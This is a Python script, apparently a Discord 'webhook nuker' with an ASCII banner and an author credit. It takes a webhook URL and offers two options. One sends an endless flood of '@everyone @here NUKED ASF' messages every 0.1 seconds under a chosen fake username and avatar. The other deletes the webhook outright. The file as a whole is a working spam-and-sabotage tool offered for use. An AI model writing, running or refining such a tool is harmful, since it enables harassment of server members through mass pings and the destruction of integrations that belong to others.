import requests
import time
import sys

def send_messages(webhook_url, username, avatar_url):
    while True:
        try:
            response = requests.post(webhook_url, json={
                "content": "@everyone @here NUKED ASF <:01despisegengar:1215567182474252328>  ",
                "username": username,
                "avatar_url": avatar_url
            })
            response.raise_for_status()  
            print("Message sent successfully.")
            time.sleep(0.1)  
        except requests.exceptions.HTTPError as err:
            print(f"Failed to send message: {err}")
        except Exception as e:
            print(f"An unexpected error occurred: {e}")

def delete_webhook(webhook_url):
    response = requests.delete(webhook_url)
    print(f"Response status code: {response.status_code}")
    print(f"Response content: {response.text}")
    if response.status_code == 204:
        print("Webhook deleted successfully.")
    else:
        print(f"Failed to delete webhook. Status code: {response.status_code}")
        print(f"Response content: {response.text}")

def main():
    print("""
 ███▄ ▄███▓ ▄▄▄      ▓█████▄ ▓█████     ▄▄▄▄ ▓██   ██▓     ▄████  ▒█████   ▒█████   ███▄    █ ▒███████▒  ██████ 
▓██▒▀█▀ ██▒▒████▄    ▒██▀ ██▌▓█   ▀    ▓█████▄▒██  ██▒    ██▒ ▀█▒▒██▒  ██▒▒██▒  ██▒ ██ ▀█   █ ▒ ▒ ▒ ▄▀░▒██    ▒ 
▓██    ▓██░▒██  ▀█▄  ░██   █▌▒███      ▒██▒ ▄██▒██ ██░   ▒██░▄▄▄░▒██░  ██▒▒██░  ██▒▓██  ▀█ ██▒░ ▒ ▄▀▒░ ░ ▓██▄   
▒██    ▒██ ░██▄▄▄▄██ ░▓█▄   ▌▒▓█  ▄    ▒██░█▀  ░ ▐██▓░   ░▓█  ██▓▒██   ██░▒██   ██░▓██▒  ▐▌██▒  ▄▀▒   ░  ▒   ██▒
▒██▒   ░██▒ ▓█   ▓██▒░▒████▓ ░▒████▒   ░▓█  ▀█▓░ ██▒▓░   ░▒▓███▀▒░ ████▓▒░░ ████▓▒░▒██░   ▓██░▒███████▒▒██████▒▒
░ ▒░   ░  ░ ▒▒   ▓▒█░ ▒▒▓  ▒ ░░ ▒░ ░   ░▒▓███▀▒ ██▒▒▒     ░▒   ▒ ░ ▒░▒░▒░ ░ ▒░▒░▒░ ░ ▒░   ▒ ▒ ░▒▒ ▓░▒░▒▒ ▒▓▒ ▒ ░
░  ░      ░  ▒   ▒▒ ░ ░ ▒  ▒  ░ ░  ░   ▒░▒   ░▓██ ░▒░      ░   ░   ░ ▒ ▒░   ░ ▒ ▒░ ░ ░░   ░ ▒░░░▒ ▒ ░ ▒░ ░▒  ░ ░
░      ░     ░   ▒    ░ ░  ░    ░       ░    ░▒ ▒ ░░     ░ ░   ░ ░ ░ ░ ▒  ░ ░ ░ ▒     ░   ░ ░ ░ ░ ░ ░ ░░  ░  ░  
       ░         ░  ░   ░       ░  ░    ░     ░ ░              ░     ░ ░      ░ ░           ░   ░ ░          ░  
                      ░                      ░░ ░                                             ░                 
                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                     
                                                        """)
    print("\nScript fully made by g00nzs. - github.com/g00nzs")

    webhook_url = input("Enter the webhook URL: ")
    
    try:
        response = requests.get(webhook_url)
        response.raise_for_status()
    except requests.exceptions.RequestException as err:
        print(f"Error: {err}")
        print("Invalid webhook URL. Exiting.")
        sys.exit(1)

    print("\nChoose an action:")
    print("[1]. Nuke webhook ")
    print("[2]. Delete webhook")
    print("[3]. Exit")

    choice = input("Enter your choice: ")

    if choice == "1":
        try:
            response = requests.get(webhook_url)
            response.raise_for_status()
        except requests.exceptions.RequestException as err:
            print(f"Error: {err}")
            print("Invalid webhook URL. Exiting.")
            sys.exit(1)
        
        username = input("Enter the username for the bot: ")
        avatar_url = input("Enter the profile picture URL for the bot: ")
        
        send_messages(webhook_url, username, avatar_url)
    elif choice == "2":
        try:
            response = requests.get(webhook_url)
            response.raise_for_status()
        except requests.exceptions.RequestException as err:
            print(f"Error: {err}")
            print("Invalid webhook URL. Exiting.")
            sys.exit(1)
        
        delete_webhook(webhook_url)
    elif choice == "3":
        print("Exiting Nuker.")
        sys.exit()
    else:
        print("Invalid choice. Please choose 1, 2, or 3.")

if __name__ == "__main__":
    main() 
